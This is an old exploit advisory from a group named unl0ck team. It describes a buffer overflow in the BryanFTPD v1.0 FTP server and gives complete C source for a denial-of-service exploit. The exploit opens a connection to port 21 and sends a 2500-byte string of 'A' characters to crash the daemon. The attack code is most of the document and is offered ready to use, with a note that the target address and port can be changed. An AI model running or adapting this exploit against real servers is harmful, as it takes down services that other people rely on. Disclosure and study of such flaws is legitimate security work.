[--------------------- BryanFTPD v. 1.0 Buffer Overflow --------------------] Advisory: #1 by unl0ck team Author: D4rk Eagle (darkeagle@list.ru) Overview: ------------------------------------------------------------------------- | FTP Server | | | | By: Bryan Cairns | | | | This is an ecapsulation of the ICS - Internet Component Suite. | | ICS can be found at : http://users.swing.be/francois.piette/indexuk.htm | | Please take the time to look at the code and learn something. | | If you're a Dephi Pro, you can probably give me some tips as I am still | | new to Delphi programming. | | | | Bryan Cairns | | cairnsb@ameritech.net | ------------------------------------------------------------------------- This daemon haven't site. This server wrote in Delphi bash. Many people may be say that delphi protected vs. buffer overflow, but bug in ICS component. Bug version: BryanFTPD v. 1.0. Vulnerability: If you send so long ftp command, server will going down. DoS exploit: /* ********************************************************* * DOS EXPLOIT FOR BryanFTPD v.1.0 * * written by D4rk Eagle * * * ********************************************************* */ int main(int argc, char *argv[]) { WSADATA wsa; SOCKET sock; struct sockaddr_in addr; char data[2500]; int i; // counter ;) //-------- BEGIN ;) WSAStartup(MAKEWORD(2,0), &wsa); addr.sin_family = AF_INET; addr.sin_port = htons(21); // Default is 21 Port (You may Change) addr.sin_addr.s_addr = inet_addr("127.0.0.1"); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); connect(sock, (struct sockaddr *)&addr, sizeof(addr)); for (i = 0; i < 2500; i++) data[i] = 'A'; send(sock, data, sizeof(data),0); closesocket(sock); } [--------------------------------------------------------------------------] 25/06/04. (c) unl0ck team [http://unl0ck.host.kz]